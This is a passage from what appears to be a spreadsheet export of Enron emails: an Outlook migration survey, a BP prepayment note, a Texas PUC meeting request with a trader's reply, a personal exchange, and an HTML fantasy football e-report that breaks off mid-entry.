Reeves/HOU/ECT@ECT, Lisa Brown/NA/Enron@Enron, Mark Confer/HOU/ECT@ECT, _x000D_
Melissa K Ratnala/HOU/ECT@ECT, Mike Self/Corp/Enron@ENRON, Rhonda _x000D_
Robinson/HOU/ECT@ECT, Thu T Nguyen/HOU/ECT@ECT, Vivien Pham/HOU/ECT@ECT, _x000D_
Cindy Stark/Corp/Enron@ENRON, Stanley Horton/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: 2- SURVEY/INFORMATION EMAIL May 30th_x000D_
_x000D_
Current Notes User: _x000D_
_x000D_
To ensure that you experience a successful migration from Notes to Outlook, _x000D_
it is necessary to gather individual user information prior to your date of _x000D_
migration.  Please take a few minutes to completely fill out the following _x000D_
survey. Double Click on document to put it in "Edit" mode. When you finish, _x000D_
simply click on the 'Reply With History' button then hit 'Send'  Your survey _x000D_
will automatically be sent to the Outlook 2000 Migration Mailbox._x000D_
_x000D_
Thank you._x000D_
_x000D_
Outlook 2000 Migration Team_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--------------------------------------------------------------_x000D_
_x000D_
Full Name:        Stanley Charles Horton_x000D_
_x000D_
Login ID:   shorton_x000D_
_x000D_
Extension:   36177_x000D_
_x000D_
Office Location:  EB5020_x000D_
_x000D_
What type of computer do you have?  (Desktop,  Laptop,  Both)  Desktop only_x000D_
_x000D_
Do you have a PDA?  If yes, what type do you have:   (None, IPAQ, Palm Pilot, _x000D_
Jornada)  NONE_x000D_
_x000D_
Do you have permission to access anyone's Email/Calendar?  Yes_x000D_
    If yes, who?     Cindy Stark_x000D_
_x000D_
Does anyone have permission to access your Email/Calendar? Yes _x000D_
    If yes, who?     Cindy Stark_x000D_
_x000D_
Are you responsible for updating anyone else's address book?  No_x000D_
    If yes, who?  _x000D_
_x000D_
Is anyone else responsible for updating your address book?  Yes_x000D_
    If yes, who?     Cindy Stark_x000D_
_x000D_
Do you have access to a shared calendar?  Yes_x000D_
    If yes, which shared calendar?    Cindy Stark_x000D_
_x000D_
Do you have any Distribution Groups that Messaging maintains for you (for _x000D_
mass mailings)?  Not sure????_x000D_
    If yes, please list here:  _x000D_
_x000D_
Please list all Notes databases applications that you currently use:  NONE_x000D_
_x000D_
In our efforts to plan the exact date/time of your migration, we also will _x000D_
need to know:_x000D_
_x000D_
What are your normal work hours?  From: 8:00AM     To:      5:00PM      _x000D_
Mondays through Fridays_x000D_
_x000D_
Will you be out of the office in the near future for vacation, leave, etc?  No_x000D_
       If so, when?        From (MM/DD/YY):      To (MM/DD/YY):      _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 09:29:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.fuller@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'a..shankman@enron.com', 's..bradford@enron.com', 'patrick.danaher@enron.com', 'l..nowlan@enron.com', 'tom.moran@enron.com'})</t>
  </si>
  <si>
    <t>Prepayment</t>
  </si>
  <si>
    <t>The notional value of the prepayment due British Petroleum OIl Supply for December barrels will be approximately $17 million. _x000D_
_x000D_
Regards,_x000D_
Rob Fuller</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 01:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sherrie@layfam.com', 'win.bischoff@ssmb.com', 'jterzuoli@ibjwhitehall.com', 'alfred.gilman@email.swmed.edu', 'kseifert@kcc.com', 'george.fisher@kodak.com', 'karen.n.horn@marsh.com', 'prendergast@mayo.edu', 'kenneth.lay@enron.com', 'scb@purdue.edu'})</t>
  </si>
  <si>
    <t>**PRESS RELEASE**re; Evista Early Effects</t>
  </si>
  <si>
    <t>The attached news release was sent over PRNewswire early this morning._x000D_
_x000D_
(See attached file: Evista Early Effects Release.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Evista Early Effects Release.doc</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 09:43:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'danielle.jaussaud@puc.state.tx.us'})</t>
  </si>
  <si>
    <t>FW: Texas PUC Request</t>
  </si>
  <si>
    <t>Danielle,_x000D_
_x000D_
Thank you for the invitation to discuss scheduling activities for the month of August. As I am sure you are aware this company is undergoing a significant period of turmoil. It would therefore be of great help if you could send a list of specific questions so that we may be able to answer them directly._x000D_
_x000D_
If it would aid your understanding of our activity, we have full requirement obligations in both the North and South zones that were to ramp up starting in July. This load was to reach in excess of 100 MW by September. However, the speed of switching and the location of this load were not known. In addition, we have resources off 2 power plants, both located in the South. One of these plants is consistently subjected to various types of command and control dispatch by the ISO and we are obligated to find a market for any residual energy. _x000D_
_x000D_
I trust this paints a picture of what we do and can help clarify any questions you may have. At this time, I do not feel we are in a position to comment on the actions of other QSEs as any information we have would be purely anecdotal._x000D_
_x000D_
I trust all is well,_x000D_
_x000D_
Doug Gilbert-Smith_x000D_
Director, Ercot Trading_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Theriot, Kim S.  _x000D_
Sent:	Tuesday, November 27, 2001 10:06 AM_x000D_
To:	Day, Smith L._x000D_
Cc:	Gilbert-smith, Doug_x000D_
Subject:	Texas PUC Request_x000D_
Importance:	High_x000D_
_x000D_
See info. below. I received a call this a.m. from the PUC. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Jaussaud, Danielle" &lt;Danielle.Jaussaud@puc.state.tx.us&gt;@ENRON  _x000D_
Sent:	Tuesday, November 27, 2001 9:04 AM_x000D_
To:	Theriot, Kim S._x000D_
Subject:	FW: Meeting Request_x000D_
_x000D_
_x000D_
&gt; I would like to invite you to meet with the PUC Market Oversight Division_x000D_
&gt; (MOD) staff to discuss certain load scheduling activities of the Enron_x000D_
&gt; Power Marketing QSE.  The MOD staff is trying to correctly interpret the_x000D_
&gt; load scheduling data we have analyzed for the month of August 2001, and we_x000D_
&gt; believe that a meeting would be mutually beneficial in that respect._x000D_
&gt; Please let us know who would be the Enron representative who could best_x000D_
&gt; answer questions about your company's scheduling activities, and whether_x000D_
&gt; that person would be available in the afternoon of Monday, December 3._x000D_
&gt; This is an informal meeting and we do not intend to have a PUC lawyer at_x000D_
&gt; the meeting.  However, if you do decide to have an attorney represent you_x000D_
&gt; at the meeting, please advise us._x000D_
&gt;_x000D_
&gt; Thank you for your cooperation and best regards._x000D_
&gt;_x000D_
&gt; Danielle Jaussaud_x000D_
&gt; Director of Economic Analysis_x000D_
&gt; Market Oversight Division_x000D_
&gt; Public Utility Commission_x000D_
&gt; 512-936-7396</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 08:58:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'davis.thames@enron.com'})</t>
  </si>
  <si>
    <t>that sounds good, tell k happy bday from the mckay family_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thames, Davis  _x000D_
Sent:	Wednesday, November 14, 2001 10:51 AM_x000D_
To:	Mckay, Brad_x000D_
Subject:	RE: _x000D_
_x000D_
tonight i'm taking k for dinner (her birthday) - beers beforehand might be frowned on.  how about friday afternoon?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mckay, Brad  _x000D_
Sent:	Wednesday, November 14, 2001 10:50 AM_x000D_
To:	Thames, Davis_x000D_
Subject:	RE: _x000D_
_x000D_
i am open, i know we can pull some strong people from this group. i can discuss this with you over beer this evening if you can. sorry i did not call you yesterday, i talked to fred lagrasta and he is currently in a holding pattern. rice will go 9-3 and will not go to a bowl game_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thames, Davis  _x000D_
Sent:	Wednesday, November 14, 2001 10:39 AM_x000D_
To:	Mckay, Brad_x000D_
Subject:	_x000D_
_x000D_
brad, were you serious about what we discussed the other night? we might have a way to get it to work. key would be who else wanted to get in. if you want to discuss one afternoon, let me know._x000D_
heard the owls might not get a bowl game despite 9 wins - wouldn't you go? (ha ha)</t>
  </si>
  <si>
    <t>Sat, 22 Dec 2001 08:18:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tstaab@enron.com'})</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Get Bad with Yourself 12/22/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football291.fantasy.sportsline.com/mp/options-ereports?league=getbad&amp;owner=98084.5_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football291.fantasy.sportsline.com/mp/"&gt;_x000D_
&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1218th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;&lt;br&gt;Attention Fantasy Players! Cant find that perfect gift? Let MVP.com make it easy for you! Save 10% on your next purchase when you purchase a Gift Certificate from now until 12/27/01. &lt;a href=http://www.sportsline.com/links/6/1/217/sffer1218e.cgi&gt;Click Here for Details&lt;/a&gt;.  &lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar15.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1218e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1218c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
href="http://www.sportsline.com/links/6/1/223/sffer1218v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1218t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1218ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;_x000D_
You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football291.fantasy.sportsline.com/mp/options-ereports?league=getbad&amp;owner=98084.5&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Updates&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1511&amp;"&gt;&lt;B&gt;Joe Horn&lt;/B&gt;&lt;/A&gt;, WR NO - President Taft &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Horn is once again performing like an elite Fantasy receiver. He is a must-start player during the final weeks of the NFL season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=188183&amp;"&gt;&lt;B&gt;Maurice Smith&lt;/B&gt;&lt;/A&gt;, RB ATL - Dont Mess &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;A banged-up Smith hasn't done much statistically in recent weeks. Don't depend on him during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12431&amp;"&gt;&lt;B&gt;Donald Hayes&lt;/B&gt;&lt;/A&gt;, WR CAR - Luccis Losers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hayes may step back into the forefront this week as the No. 1 wideout in place of Muhsin Muhammad. He isn't very explosive, however, and won't help Fantasy teams much during Weeks 15 through 17.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=235174&amp;"&gt;&lt;B&gt;Chris Weinke&lt;/B&gt;&lt;/A&gt;, QB CAR - Houston Big Ballers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Consider Weinke as a backup during the Fantasy playoffs. He lacks the weapons to post better-than-average numbers, but he is a good option if you need an emergency QB. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12797&amp;"&gt;&lt;B&gt;Kurt Warner&lt;/B&gt;&lt;/A&gt;, QB STL - Luccis Losers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Warner should guide many Fantasy teams to success during the playoffs. Expect fine numbers from him the rest of the way.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1034&amp;"&gt;&lt;B&gt;Rich Gannon&lt;/B&gt;&lt;/A&gt;, QB OAK - Team Chick &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gannon has been a top-flight Fantasy QB this year. He will be a key player on many title teams, and should never be benched. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12576&amp;"&gt;&lt;B&gt;Randy Moss&lt;/B&gt;&lt;/A&gt;_x000D_
, WR MIN - Team Chick &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Moss started off slow this season but has once again been one of the best wideouts. Don't hesitate to start him during your playoff run.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=235122&amp;"&gt;&lt;B&gt;Marvin Minnis&lt;/B&gt;&lt;/A&gt;, WR KC - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Minnis hasn't done much to help Fantasy owners this year. Don't use him during the remaining weeks of the NFL season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1310&amp;"&gt;&lt;B&gt;Michael Westbrook&lt;/B&gt;&lt;/A&gt;, WR WAS - C-Dawg's Boyz &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Westbrook has been inconsistent this season as a Fantasy player. He will be a good No. 2 at best during your playoffs.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=235213&amp;"&gt;&lt;B&gt;Rod Gardner&lt;/B&gt;&lt;/A&gt;, WR WAS - Houston Big Ballers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gardner has been very inconsistent this season. Unless you play in a deeper league, starting Gardner isn't advisable.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1471&amp;"&gt;&lt;B&gt;Tony Richardson&lt;/B&gt;&lt;/A&gt;, RB KC - Team Chick &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Richardson hasn't been a consistent scoring threat this year. Don't use him during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12400&amp;"&gt;&lt;B&gt;Tony Gonzalez&lt;/B&gt;&lt;/A&gt;, TE KC - Grid Iron Goons &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gonzalez hasn't played as well as expected this year. Still, he is too talented to bench during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1028&amp;"&gt;&lt;B&gt;Brett Favre&lt;/B&gt;&lt;/A&gt;, QB GB - Dont Mess &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Favre has been one of the best QBs this season. Count on him to help lead your team to Fantasy glory.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1599&amp;"&gt;&lt;B&gt;Trent Green&lt;/B&gt;&lt;/A&gt;, QB KC - Blue Balls &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;_x000D_
&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Green has been an inconsistent Fantasy QB this year. He is a risky start during the rest of the season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1593&amp;"&gt;&lt;B&gt;Bill Schroeder&lt;/B&gt;&lt;/A&gt;, WR GB - Grid Iron Goons &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Schroeder has had a solid season. Look for him to be a reliable No. 2 wideout during your postseason.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Texas Terminators &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hasselbeck has been a big disappointment this year. Don't use him during the Fantasy postseason. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1223&amp;"&gt;&lt;B&gt;Johnnie Morton&lt;/B&gt;&lt;/A&gt;, WR DET - Dont Mess &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Morton has been inconsistent this season but he will still be a solid No. 2 during the Fantasy playoffs. Keep him in your lineup.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=235256&amp;"&gt;&lt;B&gt;Reggie Wayne&lt;/B&gt;&lt;/A&gt;, WR IND - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wayne is healthy again, and showing signs of improvement. But he is not accomplishing enough statistically to help most Fantasy teams. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1262&amp;"&gt;&lt;B&gt;Amani Toomer&lt;/B&gt;&lt;/A&gt;_x000D_
, WR NYG - Grid Iron Goons &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Toomer is having a bit of a down year, but his potential to post solid Fantasy numbers makes him worth considering. He should be a solid No. 2 wideout during your playoffs.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1231&amp;"&gt;&lt;B&gt;Marvin Harrison&lt;/B&gt;&lt;/A&gt;, WR IND - C-Dawg's Boyz &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Harrison will be an important Fantasy player during the final weeks of the NFL season. He will have some good outings, even though the Colts are not in the playoff race. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1757&amp;"&gt;&lt;B&gt;Duce Staley&lt;/B&gt;&lt;/A&gt;, RB PHI - Luccis Losers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Staley started to play well late in the season. Be sure to keep him into your starting lineup. He will be an adequate back for the playoffs.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=133240&amp;"&gt;&lt;B&gt;Shawn Bryson&lt;/B&gt;&lt;/A&gt;, RB BUF - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bryson will start in place of the injured Travis Henry this week. Consider him as a No. 2 RB if you need help at that spot. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1859&amp;"&gt;&lt;B&gt;James Thrash&lt;/B&gt;&lt;/A&gt;, WR PHI - President Taft &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Thrash was not very consistent during the regular season and may not catch a lot of TD passes in the final games of the NFL regular season. He will be a No. 2 wideout at best during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1790&amp;"&gt;&lt;B&gt;David Patten&lt;/B&gt;&lt;/A&gt;, WR NE - Grid Iron Goons &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Patten's numbers have dropped off in recent weeks. Don't use him unless your team is very thin at wide receiver. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1286&amp;"&gt;&lt;B&gt;Joey Galloway&lt;/B&gt;&lt;/A&gt;, WR DAL - Team Chick &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
